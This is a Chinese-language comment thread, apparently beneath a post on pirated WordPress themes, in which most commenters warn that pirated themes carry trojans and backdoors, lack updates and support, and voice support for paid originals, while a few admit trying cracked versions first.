    • 三生石托管 三生石托管 2

      1.盜版主題大部分都包含木馬及后門程序,辛苦建好的網站誰也不想付諸東流,為了愛站,拒絕盜版。
      2.盜版主題多為陳舊老版本,漏洞多,bug多,使用起來問題百出,免費的未必是最好的,為了效率,拒絕盜版。
      3.盜版主題均無售后服務支持,出問題只能自己解決,正版用戶均可享受售后服務,技術支持,并永久跟隨官方升級更新,為了服務,拒絕盜版。

      • 奶爸建網站筆記 奶爸建網站筆記 4

        盜版主題最多拿來做下測試,商業用用盜版不放心。

        • 綠軟吧(lvr8.com) 綠軟吧(lvr8.com) 5

          還是支持收費主題

          • 活動線報網 活動線報網 1

            有沒有人像我一樣是因為想試用某個主題才去下載盜版體驗的,

            • 知更鳥愛好者 知更鳥愛好者 1

              用過盜版才會用正版

              • _Wr_ _Wr_ 1

                第二小節的WordPress打錯了

                • 趣趣金屋 趣趣金屋 2

                  我們的主題可以增加一個可以上架APP推廣的欄目嗎

                  • 小熊資源網 小熊資源網 1

                    幾乎都是從破解版體驗,才入手正版

                    • 波克城市 波克城市 2

                      拒絕盜版,網站安全第一。

                      • 明月登樓 明月登樓 0

                        國外的盜版還是少用,要用就用我們鳥哥的盜版主題,用的安心。 :cool:

                          • _Wr_ _Wr_ 1

                            @ 明月登樓 其實Begin主題還是用正版的好,畢竟正版有售后嘛

                          • 旅游景點 旅游景點 4

                            支持正版。

                            • 德云女孩 德云女孩 3

                              為啥不用帝國cms呢?這樣不是安全很多嗎?